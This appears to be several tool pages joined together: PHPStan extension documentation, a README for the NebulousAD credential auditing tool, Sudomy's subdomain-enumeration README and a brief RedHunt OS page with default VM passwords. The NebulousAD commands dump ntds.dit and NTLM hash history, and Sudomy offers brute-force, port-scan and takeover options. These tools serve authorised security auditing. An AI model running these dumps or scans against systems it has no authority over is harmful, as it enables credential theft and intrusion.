Check out also phpstan-strict-rules repository for extra strict and opinionated rules for PHPStan!
Check as well phpstan-deprecation-rules for rules that detect usage of deprecated classes, methods, properties, constants and traits!

Custom error formatters
PHPStan outputs errors via formatters. You can customize the output by implementing the ErrorFormatter interface in a new class and add it to the configuration. For existing formatters, see next chapter.
interface ErrorFormatter
{

    /**
     * Formats the errors and outputs them to the console.
     *
     * @param \PHPStan\Command\AnalysisResult $analysisResult
     * @param \Symfony\Component\Console\Style\OutputStyle $style
     * @return int Error code.
     */
    public function formatErrors(
        AnalysisResult $analysisResult,
        \Symfony\Component\Console\Style\OutputStyle $style
    ): int;

}
Register the formatter in your phpstan.neon:
services:
    errorFormatter.awesome:
        class: App\PHPStan\AwesomeErrorFormatter
Use the name part after errorFormatter. as the CLI option value:
vendor/bin/phpstan analyse -c phpstan.neon -l 4 --error-format awesome src tests

Existing error formatters to be used
You can pass the following keywords to the --error-format=X parameter in order to affect the output:
  • table: Default. Grouped errors by file, colorized. For human consumption.
  • raw: Contains one error per line, with path to file, line number, and error description
  • checkstyle: Creates a checkstyle.xml compatible output. Note that you'd have to redirect output into a file in order to capture the results for later processing.
  • json: Creates minified .json output without whitespaces. Note that you'd have to redirect output into a file in order to capture the results for later processing.
  • prettyJson: Creates human readable .json output with whitespaces and indentations. Note that you'd have to redirect output into a file in order to capture the results for later processing.
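For example, to capture a machine-readable result for later processing (using the documented json keyword and a shell redirect):
vendor/bin/phpstan analyse --error-format=json src tests > phpstan-result.json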

Class reflection extensions
Classes in PHP can expose "magical" properties and methods decided at run-time, using class methods like __get, __set and __call. Because PHPStan is all about static analysis (testing code for errors without running it), it has to know about those properties and methods beforehand.
When PHPStan stumbles upon a property or a method that is unknown to built-in class reflection, it iterates over all registered class reflection extensions until it finds one that defines the property or method.
A class reflection extension cannot have PHPStan\Broker\Broker (the service for obtaining class reflections) injected in the constructor due to a circular reference issue, but extensions can implement the PHPStan\Reflection\BrokerAwareExtension interface to obtain the Broker via a setter.

Properties class reflection extensions
This extension type must implement the following interface:
namespace PHPStan\Reflection;

interface PropertiesClassReflectionExtension
{

    public function hasProperty(ClassReflection $classReflection, string $propertyName): bool;

    public function getProperty(ClassReflection $classReflection, string $propertyName): PropertyReflection;

}
Most likely you will also have to implement a new PropertyReflection class:
namespace PHPStan\Reflection;

interface PropertyReflection
{

    public function getType(): Type;

    public function getDeclaringClass(): ClassReflection;

    public function isStatic(): bool;

    public function isPrivate(): bool;

    public function isPublic(): bool;

}
This is how you register the extension in the project's PHPStan config file:
services:
    -
        class: App\PHPStan\PropertiesFromAnnotationsClassReflectionExtension
        tags:
            - phpstan.broker.propertiesClassReflectionExtension

Methods class reflection extensions
This extension type must implement the following interface:
namespace PHPStan\Reflection;

interface MethodsClassReflectionExtension
{

    public function hasMethod(ClassReflection $classReflection, string $methodName): bool;

    public function getMethod(ClassReflection $classReflection, string $methodName): MethodReflection;

}
Most likely you will also have to implement a new MethodReflection class:
namespace PHPStan\Reflection;

interface MethodReflection
{

    public function getDeclaringClass(): ClassReflection;

    public function getPrototype(): self;

    public function isStatic(): bool;

    public function isPrivate(): bool;

    public function isPublic(): bool;

    public function getName(): string;

    /**
     * @return \PHPStan\Reflection\ParameterReflection[]
     */
    public function getParameters(): array;

    public function isVariadic(): bool;

    public function getReturnType(): Type;

}
This is how you register the extension in the project's PHPStan config file:
services:
    -
        class: App\PHPStan\EnumMethodsClassReflectionExtension
        tags:
            - phpstan.broker.methodsClassReflectionExtension

Dynamic return type extensions
If the return type of a method is not always the same, but depends on an argument passed to the method, you can specify the return type by writing and registering an extension.
Because you have to write the code with the type-resolving logic, it can be as complex as you want.
After writing the sample extension, the variable $mergedArticle will have the correct type:
$mergedArticle = $this->entityManager->merge($article);
// $mergedArticle will have the same type as $article
This is the interface for dynamic return type extension:
namespace PHPStan\Type;

use PhpParser\Node\Expr\MethodCall;
use PHPStan\Analyser\Scope;
use PHPStan\Reflection\MethodReflection;

interface DynamicMethodReturnTypeExtension
{

    public function getClass(): string;

    public function isMethodSupported(MethodReflection $methodReflection): bool;

    public function getTypeFromMethodCall(MethodReflection $methodReflection, MethodCall $methodCall, Scope $scope): Type;

}
And this is how you'd write the extension that correctly resolves the EntityManager::merge() return type:
public function getClass(): string
{
    return \Doctrine\ORM\EntityManager::class;
}

public function isMethodSupported(MethodReflection $methodReflection): bool
{
    return $methodReflection->getName() === 'merge';
}

public function getTypeFromMethodCall(MethodReflection $methodReflection, MethodCall $methodCall, Scope $scope): Type
{
    if (count($methodCall->args) === 0) {
        return \PHPStan\Reflection\ParametersAcceptorSelector::selectFromArgs(
            $scope,
            $methodCall->args,
            $methodReflection->getVariants()
        )->getReturnType();
    }
    $arg = $methodCall->args[0]->value;

    return $scope->getType($arg);
}
And finally, register the extension to PHPStan in the project's config file:
services:
    -
        class: App\PHPStan\EntityManagerDynamicReturnTypeExtension
        tags:
            - phpstan.broker.dynamicMethodReturnTypeExtension
There's also an analogous functionality for:
  • static methods using DynamicStaticMethodReturnTypeExtension interface and phpstan.broker.dynamicStaticMethodReturnTypeExtension service tag.
  • functions using DynamicFunctionReturnTypeExtension interface and phpstan.broker.dynamicFunctionReturnTypeExtension service tag.

Type-specifying extensions
These extensions allow you to specify the types of expressions based on certain pre-existing conditions. This is best illustrated with a couple of examples:
if (is_int($variable)) {
    // here we can be sure that $variable is an integer
}

// using PHPUnit's asserts
self::assertNotNull($variable);
// here we can be sure that $variable is not null
A type-specifying extension cannot have PHPStan\Analyser\TypeSpecifier injected in the constructor due to a circular reference issue, but extensions can implement the PHPStan\Analyser\TypeSpecifierAwareExtension interface to obtain the TypeSpecifier via a setter.
This is the interface for type-specifying extension:
namespace PHPStan\Type;

use PhpParser\Node\Expr\StaticCall;
use PHPStan\Analyser\Scope;
use PHPStan\Analyser\SpecifiedTypes;
use PHPStan\Analyser\TypeSpecifierContext;
use PHPStan\Reflection\MethodReflection;

interface StaticMethodTypeSpecifyingExtension
{

    public function getClass(): string;

    public function isStaticMethodSupported(MethodReflection $staticMethodReflection, StaticCall $node, TypeSpecifierContext $context): bool;

    public function specifyTypes(MethodReflection $staticMethodReflection, StaticCall $node, Scope $scope, TypeSpecifierContext $context): SpecifiedTypes;

}
And this is how you'd write the extension for the second example above:
public function getClass(): string
{
    return \PHPUnit\Framework\Assert::class;
}

public function isStaticMethodSupported(MethodReflection $staticMethodReflection, StaticCall $node, TypeSpecifierContext $context): bool
{
    // The $context argument tells us if we're in an if condition or not (as in this case).
    return $staticMethodReflection->getName() === 'assertNotNull' && $context->null();
}

public function specifyTypes(MethodReflection $staticMethodReflection, StaticCall $node, Scope $scope, TypeSpecifierContext $context): SpecifiedTypes
{
    // Assuming the extension implements \PHPStan\Analyser\TypeSpecifierAwareExtension.
    // A static call has no object variable, so the asserted expression is the first argument.
    $expr = $node->args[0]->value;

    return $this->typeSpecifier->create($expr, \PHPStan\Type\TypeCombinator::removeNull($scope->getType($expr)), $context);
}
And finally, register the extension to PHPStan in the project's config file:
services:
    -
        class: App\PHPStan\AssertNotNullTypeSpecifyingExtension
        tags:
            - phpstan.typeSpecifier.staticMethodTypeSpecifyingExtension
There's also an analogous functionality for:
  • dynamic methods using MethodTypeSpecifyingExtension interface and phpstan.typeSpecifier.methodTypeSpecifyingExtension service tag.
  • functions using FunctionTypeSpecifyingExtension interface and phpstan.typeSpecifier.functionTypeSpecifyingExtension service tag.

Building
You can either run the whole build including linting and coding standards using
vendor/bin/phing
or run only tests using
vendor/bin/phing tests


NebulousAD - Automated Credential Auditing Tool


NebulousAD Automated Credential Auditing Tool.

Installation
Simply download the precompiled release (requires no python interpreter), or build from source:
Requires Python2.7 (for now)
Run git clone git@github.com:NuID/nebulousAD.git
Next, install with python setup.py install
Then initialize your key. You can get your key by visiting https://nebulous.nuid.io/#/register. Once registered, click the button to generate your API key and copy it.
Now you can initialize it like so: nebulousAD -init-key <api_key>
You can now run the tool. If it can't find your API key, you may need to restart your terminal session, since the API key is stored in an environment variable. Logging out and back in also works.

Usage
Example to dump all hashes and check them against NuID's api: nebulousAD.exe -v -snap -check
NuID Credential Auditing tool.

optional arguments:
-h, --help show this help message and exit
-ntds NTDS NTDS.DIT file to parse
-system SYSTEM SYSTEM registry hive to parse
-csv CSV Output results to CSV file at this PATH.
-json JSON Output results to JSON file at this PATH
-init-key INIT_KEY Install your Nu_I.D. API key to the current users
PATH.
-c, -check Check against Nu_I.D. API for compromised
credentials.
-snap Use ntdsutil.exe to snapshot the system registry
hive and ntds.dit file to <systemDrive>:\NuID\
-shred When performing delete operations on files, use a 7
pass overwrite with sdelete.exe. Download here:
https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-no-backup Do not backup the existing snapshots, just overwrite
them instead.
-clean-old-snaps CLEAN_OLD_SNAPS
Clean backups older than N days.

display options:
-user-status Display whether or not the user is disabled
-pwd-last-set Shows pwdLastSet attribute for each account found
within the NTDS.DIT database.
-history Dump NTLM hash history of the users.
-v Enable verbose mode.

-snap
The -snap param will automatically snapshot Active Directory (using ntdsutil.exe) and dump the ntds.dit file as well as the SYSTEM registry hive, if you have the privileges. You can also dump these manually using any variety of methods or the ntdsutil.exe tool.
If dumping manually you can point to the files with -system path\to\SYSTEM and -ntds path\to\ntds.dit. This is useful if you want to audit old snapshots.
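For example, auditing an old snapshot might look like this (the paths are hypothetical; the flags are documented below):
nebulousAD.exe -system C:\snapshots\SYSTEM -ntds C:\snapshots\ntds.dit -check -csv C:\audit\results.csv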

-check
This requires an API key from https://nebulous.nuid.io/#/register. Once you have that and have installed it with -init-key, you can check the hashes against the NuID API. If you have specified -history, it will also check each account's password history to see if a password the user previously used was compromised.

-user-status
Adds output indicating whether or not the account is Enabled or Disabled in Active Directory

-pwd-last-set
Adds output indicating the date the account's password was last set. This can be useful in detecting violations of security policy of accounts that do not get reset automatically as defined in GPO, such as Service Accounts.

-history
Also audit or dump the account's stored password history.

-shred
Use a DoD 7-pass overwrite when wiping snapshots. This requires having sdelete.exe in your path. You can get that here: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
Just download it and place it in your %SYSTEMDRIVE%\Windows\System32\ directory, or set up the environment variable.

-clean-old-snaps
Useful for cleaning backups when setting this application to run with the Task Scheduler. The SYSTEM hive and .dit file can be rather large in bigger domains and take a good amount of disk space. If you use Task Scheduler to make a daily audit, you can use this option like so: -clean-old-snaps 7 to store only one week's worth of snapshots.
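A scheduled daily audit combining these flags might look like this (a sketch using only the flags documented above):
nebulousAD.exe -v -snap -check -history -clean-old-snaps 7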

-no-backup
If we detect an old snapshot, we back it up to %SYSTEMDRIVE%\Program Files\NuID\snapshot-backups by default. This is due to ntdsutil.exe requiring an empty directory. If you want to disable this backup and just wipe the current snapshot, use this argument.


Sudomy - Subdomain Enumeration & Analysis


Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in a fast and comprehensive way.

Features

At the time of writing, Sudomy has these 9 features:
  • Easy, light, fast and powerful. Bash script is available by default in almost all Linux distributions. By using bash's multiprocessing features, all processors will be utilized optimally.
  • Subdomain enumeration process can be achieved by using active method or passive method
    • Active Method
      • Sudomy utilizes Gobuster because of its high-speed performance in carrying out DNS subdomain brute-force attacks (with wildcard support). The wordlist used comes from combined SecList (Discover/DNS) lists, which contain around 3 million entries
    • Passive Method
      • By selecting third-party sites, the enumeration process can be optimized: more results are obtained in less time. Sudomy can collect data from these 16 well-curated third-party sites:
          https://dnsdumpster.com
        https://web.archive.org
        https://shodan.io
        https://virustotal.com
        https://crt.sh
        https://www.binaryedge.io
        https://securitytrails.com
        https://sslmate.com/certspotter
        https://censys.io
        https://threatminer.org
        http://dns.bufferover.run
        https://hackertarget.com
        https://www.entrust.com/ct-search/
        https://www.threatcrowd.org
        https://riddler.io
        https://findsubdomains.com
  • Test the list of collected subdomains and probe for working http or https servers. This feature uses a third-party tool, httprobe.
  • Subdomain availability test based on Ping Sweep and/or by getting the HTTP status code.
  • The ability to detect virtual hosts (several subdomains which resolve to a single IP address). Sudomy will resolve the collected subdomains to IP addresses, then classify them if several subdomains resolve to a single IP address. This feature is very useful for the subsequent penetration testing/bug bounty process. For instance, in port scanning, a single IP address won't be scanned repeatedly
  • Port scanning of the IP addresses of collected subdomains/virtual hosts
  • Testing for subdomain takeover attacks
  • Taking screenshots of subdomains
  • Report output in HTML or CSV format

How Sudomy Works
Sudomy uses the cURL library to get the HTTP response body from third-party sites and then runs regular expressions to extract subdomains. This process fully leverages multiple processors, so more subdomains are collected in less time.
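As an illustration of the approach (a hypothetical one-liner, not Sudomy's actual code), querying one of the sources above and extracting subdomains with a regular expression could look like this:
curl -s 'https://crt.sh/?q=%25.example.com&output=json' | grep -oE '[A-Za-z0-9._-]+\.example\.com' | sort -u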

Comparison
The following are the results of passive DNS enumeration testing of Sublist3r, Subfinder and Sudomy. The domain used in this comparison is bugcrowd.com.
Sudomy | Subfinder | Sublist3r

Asciinema :

Installation
Sudomy is currently extended with the following tools. Instructions on how to install & use the application are linked below.
Tool       License                           Info
Gobuster   Apache License 2.0                not mandatory
httprobe   Tom Hudson                        mandatory
nmap       GNU General Public License v2.0   not mandatory

Dependencies
$ pip install -r requirements.txt
Sudomy requires jq to run and parse results. For more information, download and install jq here.
# Linux
=======
apt-get install jq nmap phantomjs

# Mac
brew cask install phantomjs
brew install jq nmap
If you have a Go environment ready to go, it's as easy as:
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
go get -u github.com/tomnomnom/httprobe
go get -u github.com/OJ/gobuster
Download Sudomy From Github
# Clone this repository
git clone --recursive https://github.com/screetsec/Sudomy.git

# Go into the repository
cd Sudomy

# Show the help
./sudomy --help

Running in a Docker Container
# Pull an image from DockerHub
docker pull screetsec/sudomy:v1.1.0

# Run the image; you can run it from a custom directory, but you must copy/download the sudomy.api config into the current directory
docker run -v "${PWD}/output:/usr/lib/sudomy/output" -v "${PWD}/sudomy.api:/usr/lib/sudomy/sudomy.api" -it --rm screetsec/sudomy:v1.1.0 [argument]

Post Installation
An API key is needed before querying third-party sites such as Shodan, Censys, SecurityTrails, VirusTotal and BinaryEdge.
  • The API keys can be set in the sudomy.api file.
# Shodan
# URL : http://developer.shodan.io
# Example :
# - SHODAN_API="VGhpc1M0bXBsZWwKVGhmcGxlbAo"

SHODAN_API=""

# Censys
# URL : https://censys.io/register

CENSYS_API=""
CENSYS_SECRET=""

# Virustotal
# URL : https://www.virustotal.com/gui/
VIRUSTOTAL=""


# Binaryedge
# URL : https://app.binaryedge.io/login
BINARYEDGE=""


# SecurityTrails
# URL : https://securitytrails.com/
SECURITY_TRAILS=""

Usage
 ___         _ _  _
/ __|_ _ __| (_)(_)_ __ _ _
\__ \ || / _ / __ \ ' \ || |
|___/\_,_\__,_\____/_|_|_\_, |
|__/ v{1.1.0#dev} by @screetsec
Sudomy - Fast Subdomain Enumeration and Analyzer
http://github.com/screetsec/sudomy

Usage: sudomy.sh [-h [--help]] [-s[--source]][-d[--domain=]]

Example: sudomy.sh -d example.com
sudomy.sh -s Shodan,VirusTotal -d example.com
sudomy.sh -pS -rS -sC -nT -sS -d example.com

Optional Arguments:
-a, --all Running all Enumeration, no nmap & gobuster
-b, --bruteforce Bruteforce Subdomain Using Gobuster (Wordlist: ALL Top SecList DNS)
-d, --domain domain of the website to scan
-h, --help show this help message
-o, --html Make report output into HTML
-s, --source Use source for Enumerate Subdomain
-tO, --takeover Subdomain TakeOver Vulnerability Scanner
-pS, --ping-sweep Check live hosts using the Ping Sweep method
-rS, --resolver Convert domain lists to resolved IP lists without duplicates
-sC, --status-code Get status codes, response from domain list
-nT, --nmap-top Port scanning with top-ports using nmap from domain list
-sS, --screenshot Screenshots a list of website
-nP, --no-passive Do not perform passive subdomain enumeration
--no-probe Do not perform httprobe
To use all 16 Sources and Probe for working http or https servers:
$ sudomy -d hackerone.com
To use one or more sources:
$ sudomy -s shodan,dnsdumpster,webarchive -d hackerone.com
To use all plugins: testing host status, http/https status code, subdomain takeover and screenshots
$ sudomy -pS -sC -sS -d hackerone.com
To create a report in HTML format:
$ sudomy --all -d hackerone.com
HTML Report Sample:
Dashboard | Reports

Tools Overview
  • Youtube Videos : Click here

Translations

Changelog
All notable changes to this project will be documented in this file.

Credits & Thanks


RedHunt OS v2 - Virtual Machine For Adversary Emulation And Threat Hunting


Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs
RedHunt OS aims to be a one-stop shop for all your threat emulation and threat hunting needs by integrating the attacker's arsenal as well as the defender's toolkit to actively identify threats in your environment.

Base Machine:
  • Lubuntu-18.04 x64

Tool Setup

Attack Emulation:

Threat Hunting:

Open Source Intelligence (OSINT):

Threat Intelligence:

Reporting:

VM Download Link:
Changelog
  • System Updates
  • Tool Updates
  • New Categories added: Reporting
  • Outdated tools removed
  • Base OS Updated to 18.04
Setup:
VM Credentials: Username: hunter Password: hunter
Caldera Credentials: Username: admin Password: caldera

Checksums:
Version 1
  • MD5: f8d433140f7e2b370b81c8b6ed3c951f
  • SHA1: 66b6a9bdbd2c6f029de9d17a2e086166a1ab7fd3

Sneak Peek:





To-Do:

Website:

Twitter:

References:

